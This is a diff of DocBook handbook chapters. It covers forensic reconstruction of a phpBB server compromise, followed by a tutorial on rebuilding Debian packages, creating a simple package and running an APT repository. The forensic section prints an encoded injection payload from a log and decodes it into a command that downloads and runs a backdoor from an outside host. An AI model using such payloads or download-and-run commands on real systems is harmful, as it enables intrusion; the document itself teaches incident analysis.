+				The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly <emphasis>backdoors</emphasis>). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
+			</para>
+			 <para>
+				Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems. Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.
+			</para>
+
+		</section>
+		 <section id="sect.forensic-analysis">
+			<title>Forensic Analysis</title>
+			 <para>
+				Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the <literal>ro,nodev,noexec,noatime</literal> options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
+			</para>
+			 <para>
+				Retracing an attack scenario usually involves looking for everything that was modified and executed:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						<filename>.bash_history</filename> files often provide for a very interesting read;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						so does listing files that were recently created, modified or accessed;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the <command>strings</command> command helps identifying programs installed by the attacker, by extracting text strings from a binary;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						the log files in <filename>/var/log/</filename> often allow reconstructing a chronology of events;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <para>
+				Some of these operations can be made easier with specialized software. In particular, the <emphasis role="pkg">sleuthkit</emphasis> package provides many tools to analyze a filesystem. Their use is made easier by the <emphasis>Autopsy Forensic Browser</emphasis> graphical interface (in the <emphasis role="pkg">autopsy</emphasis> package).
+			</para>
+			 <indexterm>
+				<primary>Autopsy Forensic Browser</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>The Sleuth Kit</primary>
+			</indexterm>
+
+		</section>
+		 <section id="sect.reconstituting-the-attack-scenario">
+			<title>Reconstituting the Attack Scenario</title>
+			 <para>
+				All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
+			</para>
+			 <para>
+				The following log is an extract from an Apache <filename>access.log</filename>:
+			</para>
+			 
+<programlisting>
+www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&amp;highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
+</programlisting>
+			 <para>
+				This example matches exploitation of an old security vulnerability in phpBB. <ulink type="block" url="http://secunia.com/advisories/13239/" /> <ulink type="block" url="http://www.phpbb.com/phpBB/viewtopic.php?t=240636" />
+			</para>
+			 <para>
+				Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: <command>system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &amp;")</command>. Indeed, a <filename>bd</filename> file was found in <filename>/tmp/</filename>. Running <command>strings /mnt/tmp/bd</command> returns, among other strings, <literal>PsychoPhobia Backdoor is starting...</literal>. This really looks like a backdoor.
+			</para>
+			 <para>
+				Some time later, this access was used to download, install and run an IRC <emphasis>bot</emphasis> that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
+			</para>
+			 
+<programlisting>** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
+** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
+** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
+** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
+** 2004-11-29-19:50:20: DCC CHAT Correct password
+(...)
+** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
+(...)
+** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
+(...)
+** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
+(...)
+** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
+</programlisting>
+			 <para>
+				These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
+			</para>
+			 <para>
+				In parallel, the attacker also downloaded a pair of extra files, <filename>/tmp/pt</filename> and <filename>/tmp/loginx</filename>. Running these files through <command>strings</command> leads to strings such as <foreignphrase>Shellcode placed at 0x%08lx</foreignphrase> and <foreignphrase>Now wait for suid shell...</foreignphrase>. These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
+			</para>
+			 <para>
+				In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.
+			</para>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/15_debian-packaging.xml b/tmp/cs-CZ/xml/15_debian-packaging.xml
new file mode 100644
index 000000000..ccdafa617
--- /dev/null
+++ b/tmp/cs-CZ/xml/15_debian-packaging.xml
@@ -0,0 +1,672 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="debian-packaging" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Backport</keyword>
+			 <keyword>Rebuild</keyword>
+			 <keyword>Source package</keyword>
+			 <keyword>Archive</keyword>
+			 <keyword>Meta-package</keyword>
+			 <keyword>Debian Developer</keyword>
+			 <keyword>Maintainer</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Creating a Debian Package</title>
+	 <highlights> <para>
+		It is quite common, for an administrator who has been handling Debian packages in a regular fashion, to eventually feel the need to create their own packages, or to modify an existing package. This chapter aims to answer the most common questions in this field, and provide the required elements to take advantage of the Debian infrastructure in the best way. With any luck, after trying your hand for local packages, you may even feel the need to go further than that and join the Debian project itself!
+	</para>
+	 </highlights> <section id="sect.rebuilding-package">
+		<title>Rebuilding a Package from its Sources</title>
+		 <para>
+			Rebuilding a binary package is required under several sets of circumstances. In some cases, the administrator needs a software feature that requires the software to be compiled from sources, with a particular compilation option; in others, the software as packaged in the installed version of Debian is not recent enough. In the latter case, the administrator will usually build a more recent package taken from a newer version of Debian — such as <emphasis role="distribution">Testing</emphasis> or even <emphasis role="distribution">Unstable</emphasis> — so that this new package works in their <emphasis role="distribution">Stable</emphasis> distribution; this operation is called “backporting”. As usual, care should be taken, before undertaking such a task, to check whether it has been done already — a quick look on the Debian Package Tracker for that package will reveal that information. <ulink type="block" url="https://tracker.debian.org/" /> <indexterm><primary>backport</primary></indexterm>
+		</para>
+		 <section>
+			<title>Getting the Sources</title>
+			 <para>
+				Rebuilding a Debian package starts with getting its source code. The easiest way is to use the <command>apt-get source <replaceable>source-package-name</replaceable></command> command. This command requires a <literal>deb-src</literal> line in the <filename>/etc/apt/sources.list</filename> file, and up-to-date index files (i.e. <command>apt-get update</command>). These conditions should already be met if you followed the instructions from the chapter dealing with APT configuration (see <xref linkend="sect.apt-sources.list" />). Note however, that you will be downloading the source packages from the Debian version mentioned in the <literal>deb-src</literal> line. If you need another version, you may need to download it manually from a Debian mirror or from the web site. This involves fetching two or three files (with extensions <filename>*.dsc</filename> — for <emphasis>Debian Source Control</emphasis> — <filename>*.tar.<replaceable>comp</replaceable></filename>, and sometimes <filename>*.diff.gz</filename> or <filename>*.debian.tar.<replaceable>comp</replaceable></filename> — <replaceable>comp</replaceable> taking one value among <literal>gz</literal>, <literal>bz2</literal> or <literal>xz</literal> depending on the compression tool in use), then run the <command>dpkg-source -x <replaceable>file.dsc</replaceable></command> command. If the <filename>*.dsc</filename> file is directly accessible at a given URL, there is an even simpler way to fetch it all, with the <command>dget <replaceable>URL</replaceable></command> command. This command (which can be found in the <emphasis role="pkg">devscripts</emphasis> package) fetches the <filename>*.dsc</filename> file at the given address, then analyzes its contents, and automatically fetches the file or files referenced within. Once everything has been downloaded, it extracts the source package (unless the <literal>-d</literal> or <literal>--download-only</literal> option is used).
+			</para>
+
+		</section>
+		 <section>
+			<title>Making Changes</title>
+			 <para>
+				The source of the package is now available in a directory named after the source package and its version (for instance, <emphasis>samba-4.1.17+dfsg</emphasis>); this is where we'll work on our local changes.
+			</para>
+			 <para>
+				The first thing to do is to change the package version number, so that the rebuilt packages can be distinguished from the original packages provided by Debian. Assuming the current version is <literal>2:4.1.17+dfsg-2</literal>, we can create version <literal>2:4.1.17+dfsg-2falcot1</literal>, which clearly indicates the origin of the package. This makes the package version number higher than the one provided by Debian, so that the package will easily install as an update to the original package. Such a change is best effected with the <command>dch</command> command (<emphasis>Debian CHangelog</emphasis>) from the <emphasis role="pkg">devscripts</emphasis> package, with an command such as <command>dch --local falcot</command>. This invokes a text editor (<command>sensible-editor</command> — this should be your favorite editor if it is mentioned in the <varname>VISUAL</varname> or <varname>EDITOR</varname> environment variables, and the default editor otherwise) to allow documenting the differences brought by this rebuild. This editor shows us that <command>dch</command> really did change the <filename>debian/changelog</filename> file.
+			</para>
+			 <para>
+				When a change in build options is required, the changes need to be made in <filename>debian/rules</filename>, which drives the steps in the package build process. In the simplest cases, the lines concerning the initial configuration (<literal>./configure …</literal>) or the actual build (<literal>$(MAKE) …</literal> or <literal>make …</literal>) are easy to spot. If these commands are not explicitly called, they are probably a side effect of another explicit command, in which case please refer to their documentation to learn more about how to change the default behavior. With packages using <command>dh</command>, you might need to add an override for the <command>dh_auto_configure</command> or <command>dh_auto_build</command> commands (see their respective manual pages for explanations on how to achieve this).
+			</para>
+			 <para>
+				Depending on the local changes to the packages, an update may also be required in the <filename>debian/control</filename> file, which contains a description of the generated packages. In particular, this file contains <literal>Build-Depends</literal> lines controlling the list of dependencies that must be fulfilled at package build time. These often refer to versions of packages contained in the distribution the source package comes from, but which may not be available in the distribution used for the rebuild. There is no automated way to determine if a dependency is real or only specified to guarantee that the build should only be attempted with the latest version of a library — this is the only available way to force an <emphasis>autobuilder</emphasis> to use a given package version during build, which is why Debian maintainers frequently use strictly versioned build-dependencies.
+			</para>
+			 <para>
+				If you know for sure that these build-dependencies are too strict, you should feel free to relax them locally. Reading the files which document the standard way of building the software — these files are often called <filename>INSTALL</filename> — will help you figure out the appropriate dependencies. Ideally, all dependencies should be satisfiable from the distribution used for the rebuild; if they are not, a recursive process starts, whereby the packages mentioned in the <literal>Build-Depends</literal> field must be backported before the target package can be. Some packages may not need backporting, and can be installed as-is during the build process (a notable example is <emphasis role="pkg">debhelper</emphasis>). Note that the backporting process can quickly become complex if you are not careful. Therefore, backports should be kept to a strict minimum when possible.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Installing <literal>Build-Depends</literal></title>
+			 <indexterm>
+				<primary><literal>Build-Depends</literal>, control field</primary>
+			</indexterm>
+			 <para>
+				<command>apt-get</command> allows installing all packages mentioned in the <literal>Build-Depends</literal> fields of a source package available in a distribution mentioned in a <literal>deb-src</literal> line of the <filename>/etc/apt/sources.list</filename> file. This is a simple matter of running the <command>apt-get build-dep <replaceable>source-package</replaceable></command> command.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Starting the Rebuild</title>
+			 <para>
+				When all the needed changes have been applied to the sources, we can start generating the actual binary package (<filename>.deb</filename> file). The whole process is managed by the <command>dpkg-buildpackage</command> command.
+			</para>
+			 <example>
+				<title>Rebuilding a package</title>
+				 
+<screen><computeroutput>$ </computeroutput><userinput>dpkg-buildpackage -us -uc
+</userinput><computeroutput>[...]
+</computeroutput></screen>
+
+			</example>
+			 <sidebar id="sidebar.fakeroot"> <title><emphasis>TOOL</emphasis> <command>fakeroot</command></title>
+			 <para>
+				In essence, the package creation process is a simple matter of gathering in an archive a set of existing (or built) files; most of the files will end up being owned by <emphasis>root</emphasis> in the archive. However, building the whole package under this user would imply increased risks; fortunately, this can be avoided with the <command>fakeroot</command> command. This tool can be used to run a program and give it the impression that it runs as <emphasis>root</emphasis> and creates files with arbitrary ownership and permissions. When the program creates the archive that will become the Debian package, it is tricked into creating an archive containing files marked as belonging to arbitrary owners, including <emphasis>root</emphasis>. This setup is so convenient that <command>dpkg-buildpackage</command> uses <command>fakeroot</command> by default when building packages.
+			</para>
+			 <para>
+				Note that the program is only tricked into “believing” that it operates as a privileged account, and the process actually runs as the user running <command>fakeroot <replaceable>program</replaceable></command> (and the files are actually created with that user's permissions). At no time does it actually get root privileges that it could abuse.
+			</para>
+			 </sidebar> <para>
+				The previous command can fail if the <literal>Build-Depends</literal> fields have not been updated, or if the related packages are not installed. In such a case, it is possible to overrule this check by passing the <literal>-d</literal> option to <command>dpkg-buildpackage</command>. However, explicitly ignoring these dependencies runs the risk of the build process failing at a later stage. Worse, the package may seem to build correctly but fail to run properly: some programs automatically disable some of their features when a required library is not available at build time.
+			</para>
+			 <para>
+				More often than not, Debian developers use a higher-level program such as <command>debuild</command>; this runs <command>dpkg-buildpackage</command> as usual, but it also adds an invocation of a program that runs many checks to validate the generated package against the Debian policy. This script also cleans up the environment so that local environment variables do not “pollute” the package build. The <command>debuild</command> command is one of the tools in the <emphasis>devscripts</emphasis> suite, which share some consistency and configuration to make the maintainers' task easier.
+			</para>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> <command>pbuilder</command></title>
+			 <indexterm>
+				<primary><command>pbuilder</command></primary>
+			</indexterm>
+			 <para>
+				The <command>pbuilder</command> program (in the similarly named package) allows building a Debian package in a <emphasis>chrooted</emphasis> environment. It first creates a temporary directory containing the minimal system required for building the package (including the packages mentioned in the <emphasis>Build-Depends</emphasis> field). This directory is then used as the root directory (<filename>/</filename>), using the <command>chroot</command> command, during the build process.
+			</para>
+			 <para>
+				This tool allows the build process to happen in an environment that is not altered by users' manipulations. This also allows for quick detection of the missing build-dependencies (since the build will fail unless the appropriate dependencies are documented). Finally, it allows building a package for a Debian version that is not the one used by the system as a whole: the machine can be using <emphasis role="distribution">Stable</emphasis> for its normal workload, and a <command>pbuilder</command> running on the same machine can be using <emphasis role="distribution">Unstable</emphasis> for package builds.
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+	 <section id="sect.building-first-package">
+		<title>Building your First Package</title>
+		 <section>
+			<title>Meta-Packages or Fake Packages</title>
+			 <para>
+				Fake packages and meta-packages are similar, in that they are empty shells that only exist for the effects their meta-data have on the package handling stack.
+			</para>
+			 <para>
+				The purpose of a fake package is to trick <command>dpkg</command> and <command>apt</command> into believing that some package is installed even though it's only an empty shell. This allows satisfying dependencies on a package when the corresponding software was installed outside the scope of the packaging system. Such a method works, but it should still be avoided whenever possible, since there is no guarantee that the manually installed software behaves exactly like the corresponding package would and other packages depending on it would not work properly.
+			</para>
+			 <para>
+				On the other hand, a meta-package exists mostly as a collection of dependencies, so that installing the meta-package will actually bring in a set of other packages in a single step.
+			</para>
+			 <para>
+				Both these kinds of packages can be created by the <command>equivs-control</command> and <command>equivs-build</command> commands (in the <emphasis role="pkg">equivs</emphasis> package). The <command>equivs-control <replaceable>file</replaceable></command> command creates a Debian package header file that should be edited to contain the name of the expected package, its version number, the name of the maintainer, its dependencies, and its description. Other fields without a default value are optional and can be deleted. The <literal>Copyright</literal>, <literal>Changelog</literal>, <literal>Readme</literal> and <literal>Extra-Files</literal> fields are not standard fields in Debian packages; they only make sense within the scope of <command>equivs-build</command>, and they will not be kept in the headers of the generated package.
+			</para>
+			 <example>
+				<title>Header file of the <emphasis>libxml-libxml-perl</emphasis> fake package</title>
+				 
+<programlisting>
+Section: perl
+Priority: optional
+Standards-Version: 3.9.6
+
+Package: libxml-libxml-perl
+Version: 2.0116-1
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Depends: libxml2 (&gt;= 2.7.4)
+Architecture: all
+Description: Fake package - module manually installed in site_perl
+ This is a fake package to let the packaging system
+ believe that this Debian package is installed. 
+ .
+ In fact, the package is not installed since a newer version
+ of the module has been manually compiled &amp; installed in the
+ site_perl directory.
+</programlisting>
+
+			</example>
+			 <para>
+				The next step is to generate the Debian package with the <command>equivs-build <replaceable>file</replaceable></command> command. Voilà: the package is created in the current directory and it can be handled like any other Debian package would.
+			</para>
+
+		</section>
+		 <section>
+			<title>Simple File Archive</title>
+			 <para>
+				The Falcot Corp administrators need to create a Debian package in order to ease deployment of a set of documents on a large number of machines. The administrator in charge of this task first reads the “New Maintainer's Guide”, then starts working on their first package. <ulink type="block" url="https://www.debian.org/doc/manuals/maint-guide/" />
+			</para>
+			 <para>
+				The first step is creating a <filename>falcot-data-1.0</filename> directory to contain the target source package. The package will logically, be named <literal>falcot-data</literal> and bear the <literal>1.0</literal> version number. The administrator then places the document files in a <filename>data</filename> subdirectory. Then they invoke the <command>dh_make</command> command (from the <emphasis role="pkg">dh-make</emphasis> package) to add files required by the package generation process, which will all be stored in a <filename>debian</filename> subdirectory:
+			</para>
+			 
+<screen>
+<computeroutput>$ </computeroutput><userinput>cd falcot-data-1.0</userinput>
+<computeroutput>$ </computeroutput><userinput>dh_make --native</userinput>
+<computeroutput>
+Type of package: single binary, indep binary, multiple binary, library, kernel module, kernel patch?
+ [s/i/m/l/k/n] </computeroutput><userinput>i</userinput>
+<computeroutput>
+Maintainer name : Raphael Hertzog
+Email-Address   : hertzog@debian.org
+Date            : Fri, 04 Sep 2015 12:09:39 -0400
+Package Name    : falcot-data
+Version         : 1.0
+License         : gpl3
+Type of Package : Independent
+Hit &lt;enter&gt; to confirm:
+Currently there is no top level Makefile. This may require additional tuning.
+Done. Please edit the files in the debian/ subdirectory now. You should also
+check that the falcot-data Makefiles install into $DESTDIR and not in / .
+$</computeroutput></screen>
+			 <para>
+				The selected type of package (<emphasis>indep binary</emphasis>) indicates that this source package will generate a single binary package that can be shared across all architectures (<literal>Architecture: all</literal>). <emphasis>single binary</emphasis> acts as a counterpart, and leads to a single binary package that is dependent on the target architecture (<literal>Architecture: any</literal>). In this case, the former choice is more relevant since the package only contains documents and no binary programs, so it can be used similarly on computers of all architectures.
+			</para>
+			 <indexterm>
+				<primary>package types</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>package</primary>
+				<secondary>types</secondary>
+			</indexterm>
+			 <para>
+				The <emphasis>multiple binary</emphasis> type corresponds to a source package leading to several binary packages. A particular case, <emphasis>library</emphasis>, is useful for shared libraries, since they need to follow strict packaging rules. In a similar fashion, <emphasis>kernel module</emphasis> or <emphasis>kernel patch</emphasis> should be restricted to packages containing kernel modules.
+			</para>
+			 <sidebar> <title><emphasis>TIP</emphasis> Maintainer's name and email address</title>
+			 <para>
+				Most of the programs involved in package maintenance will look for your name and email address in the <varname>DEBFULLNAME</varname> and <varname>DEBEMAIL</varname> or <varname>EMAIL</varname> environment variables. Defining them once and for all will avoid you having to type them multiple times. If your usual shell is <command>bash</command>, it is a simple matter of adding the following two lines in your <filename>~/.bashrc</filename> file (you will obviously replace the values with more relevant ones!):
+			</para>
+			 
+<programlisting>
+export EMAIL="hertzog@debian.org"
+export DEBFULLNAME="Raphael Hertzog"
+</programlisting>
+			 </sidebar> <para>
+				The <command>dh_make</command> command created a <filename>debian</filename> subdirectory with many files. Some are required, in particular <filename>rules</filename>, <filename>control</filename>, <filename>changelog</filename> and <filename>copyright</filename>. Files with the <filename>.ex</filename> extension are example files that can be used by modifying them (and removing the extension) when appropriate. When they are not needed, removing them is recommended. The <filename>compat</filename> file should be kept, since it is required for the correct functioning of the <emphasis>debhelper</emphasis> suite of programs (all beginning with the <command>dh_</command> prefix) used at various stages of the package build process.
+			</para>
+			 <para>
+				The <filename>copyright</filename> file must contain information about the authors of the documents included in the package, and the related license. In our case, these are internal documents and their use is restricted to within the Falcot Corp company. The default <filename>changelog</filename> file is generally appropriate; replacing the “Initial release” with a more verbose explanation and changing the distribution from <literal>unstable</literal> to <literal>internal</literal> is enough. The <filename>control</filename> file was also updated: the <literal>Section</literal> field has been changed to <emphasis>misc</emphasis> and the <literal>Homepage</literal>, <literal>Vcs-Git</literal> and <literal>Vcs-Browser</literal> fields were removed. The <literal>Depends</literal> fields was completed with <literal>iceweasel | www-browser</literal> so as to ensure the availability of a web browser able to display the documents in the package.
+			</para>
+			 <example>
+				<title>The <filename>control</filename> file</title>
+				 
+<programlisting>
+Source: falcot-data
+Section: misc
+Priority: optional
+Maintainer: Raphael Hertzog &lt;hertzog@debian.org&gt;
+Build-Depends: debhelper (&gt;= 9)
+Standards-Version: 3.9.5
+
+Package: falcot-data
+Architecture: all
+Depends: iceweasel | www-browser, ${misc:Depends}
+Description: Internal Falcot Corp Documentation
+ This package provides several documents describing the internal
+ structure at Falcot Corp.  This includes:
+  - organization diagram
+  - contacts for each department.
+ .
+ These documents MUST NOT leave the company.
+ Their use is INTERNAL ONLY.
+</programlisting>
+
+			</example>
+			 <example>
+				<title>The <filename>changelog</filename> file</title>
+				 
+<programlisting>
+falcot-data (1.0) internal; urgency=low
+
+  * Initial Release.
+  * Let's start with few documents:
+    - internal company structure;
+    - contacts for each department.
+
+ -- Raphael Hertzog &lt;hertzog@debian.org&gt;  Fri, 04 Sep 2015 12:09:39 -0400
+</programlisting>
+
+			</example>
+			 <example>
+				<title>The <filename>copyright</filename> file</title>
+				 
+<programlisting>
+Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
+Upstream-Name: falcot-data
+
+Files: *
+Copyright: 2004-2015 Falcot Corp
+License: 
+ All rights reserved.
+</programlisting>
+
+			</example>
+			 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> <filename>Makefile</filename> file</title>
+			 <indexterm>
+				<primary><filename>Makefile</filename></primary>
+			</indexterm>
+			 <para>
+				A <filename>Makefile</filename> file is a script used by the <command>make</command> program; it describes rules for how to build a set of files from each other in a tree of dependencies (for instance, a program can be built from a set of source files). The <filename>Makefile</filename> file describes these rules in the following format:
+			</para>
+			 
+<programlisting>
+target: source1 source2 ...
+        command1
+        command2
+</programlisting>
+			 <para>
+				The interpretation of such a rule is as follows: if one of the <literal>source*</literal> files is more recent than the <literal>target</literal> file, then the target needs to be generated, using <command>command1</command> and <command>command2</command>.
+			</para>
+			 <para>
+				Note that the command lines must start with a tab character; also note that when a command line starts with a dash character (<literal>-</literal>), failure of the command does not interrupt the whole process.
+			</para>
+			 </sidebar> <para>
+				The <filename>rules</filename> file usually contains a set of rules used to configure, build and install the software in a dedicated subdirectory (named after the generated binary package). The contents of this subdirectory is then archived within the Debian package as if it were the root of the filesystem. In our case, files will be installed in the <filename>debian/falcot-data/usr/share/falcot-data/</filename> subdirectory, so that installing the generated package will deploy the files under <filename>/usr/share/falcot-data/</filename>. The <filename>rules</filename> file is used as a <filename>Makefile</filename>, with a few standard targets (including <literal>clean</literal> and <literal>binary</literal>, used respectively to clean the source directory and generate the binary package).
+			</para>
+			 <para>
+				Although this file is the heart of the process, it increasingly contains only the bare minimum for running a standard set of commands provided by the <command>debhelper</command> tool. Such is the case for files generated by <command>dh_make</command>. To install our files, we simply configure the behavior of the <command>dh_install</command> command by creating the following <filename>debian/falcot-data.install</filename> file:
+			</para>
+			 
+<programlisting>
+data/* usr/share/falcot-data/
+</programlisting>
+			 <para>
+				At this point, the package can be created. We will however add a lick of paint. Since the administrators want the documents to be easily accessed from the menus of graphical desktop environments, we add a <filename>falcot-data.desktop</filename> file and get it installed in <filename>/usr/share/applications</filename> by adding a second line to <filename>debian/falcot-data.install</filename>.
+			</para>
+			 <example>
+				<title>The <filename>falcot-data.desktop</filename> file</title>
+				 
+<programlisting>
+[Desktop Entry]
+Name=Internal Falcot Corp Documentation
+Comment=Starts a browser to read the documentation
+Exec=x-www-browser /usr/share/falcot-data/index.html
+Terminal=false
+Type=Application
+Categories=Documentation;
+</programlisting>
+
+			</example>
+			 <para>
+				The updated <filename>debian/falcot-data.install</filename> looks like this:
+			</para>
+			 
+<programlisting>
+data/* usr/share/falcot-data/
+falcot-data.desktop usr/share/applications/
+</programlisting>
+			 <para>
+				Our source package is now ready. All that's left to do is to generate the binary package, with the same method we used previously for rebuilding packages: we run the <command>dpkg-buildpackage -us -uc</command> command from within the <filename>falcot-data-1.0</filename> directory.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.setup-apt-package-repository">
+		<title>Creating a Package Repository for APT</title>
+		 <indexterm>
+			<primary>package archive</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>package</primary>
+			<secondary>Debian</secondary>
+			<tertiary>archive of</tertiary>
+		</indexterm>
+		 <para>
+			Falcot Corp gradually started maintaining a number of Debian packages either locally modified from existing packages or created from scratch to distribute internal data and programs.
+		</para>
+		 <para>
+			To make deployment easier, they want to integrate these packages in a package archive that can be directly used by APT. For obvious maintenance reasons, they wish to separate internal packages from locally-rebuilt packages. The goal is for the matching entries in a <filename>/etc/apt/sources.list.d/falcot.list</filename> file to be as follows:
+		</para>
+		 
+<programlisting>
+deb http://packages.falcot.com/ updates/
+deb http://packages.falcot.com/ internal/
+</programlisting>
+		 <indexterm>
+			<primary><command>mini-dinstall</command></primary>
+		</indexterm>
+		 <para>
+			The administrators therefore configure a virtual host on their internal HTTP server, with <filename>/srv/vhosts/packages/</filename> as the root of the associated web space. The management of the archive itself is delegated to the <command>mini-dinstall</command> command (in the similarly-named package). This tool keeps an eye on an <filename>incoming/</filename> directory (in our case, <filename>/srv/vhosts/packages/mini-dinstall/incoming/</filename>) and waits for new packages there; when a package is uploaded, it is installed into a Debian archive at <filename>/srv/vhosts/packages/</filename>. The <command>mini-dinstall</command> command reads the <filename>*.changes</filename> file created when the Debian package is generated. These files contain a list of all other files associated with the version of the package (<filename>*.deb</filename>, <filename>*.dsc</filename>, <filename>*.diff.gz</filename>/<filename>*.debian.tar.gz</filename>, <filename>*.orig.tar.gz</filename>, or their equivalents with other compression tools), and these allow <command>mini-dinstall</command> to know which files to install. <filename>*.changes</filename> files also contain the name of the target distribution (often <literal>unstable</literal>) mentioned in the latest <filename>debian/changelog</filename> entry, and <command>mini-dinstall</command> uses this information to decide where the package should be installed. This is why administrators must always change this field before building a package, and set it to <literal>internal</literal> or <literal>updates</literal>, depending on the target location. <command>mini-dinstall</command> then generates the files required by APT, such as <filename>Packages.gz</filename>.
+		</para>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> <command>apt-ftparchive</command></title>
+		 <indexterm>
+			<primary><command>apt-ftparchive</command></primary>
+		</indexterm>
+		 <para>
+			If <command>mini-dinstall</command> seems too complex for your Debian archive needs, you can also use the <command>apt-ftparchive</command> command. This tool scans the contents of a directory and displays (on its standard output) a matching <filename>Packages</filename> file. In the Falcot Corp case, administrators could upload the packages directly into <filename>/srv/vhosts/packages/updates/</filename> or <filename>/srv/vhosts/packages/internal/</filename>, then run the following commands to create the <filename>Packages.gz</filename> files:
+		</para>
+		 
+<screen>
+<computeroutput>$ </computeroutput><userinput>cd /srv/vhosts/packages</userinput>
+<computeroutput>$ </computeroutput><userinput>apt-ftparchive packages updates &gt;updates/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>gzip updates/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>apt-ftparchive packages internal &gt;internal/Packages</userinput>
+<computeroutput>$ </computeroutput><userinput>gzip internal/Packages</userinput></screen>
+		 <para>
+			The <command>apt-ftparchive sources</command> command allows creating <filename>Sources.gz</filename> files in a similar fashion.
+		</para>
+		 </sidebar> <para>
+			Configuring <command>mini-dinstall</command> requires setting up a <filename>~/.mini-dinstall.conf</filename> file; in the Falcot Corp case, the contents are as follows:
+		</para>
+		 
+<programlisting>
+[DEFAULT]
+archive_style = flat
+archivedir = /srv/vhosts/packages
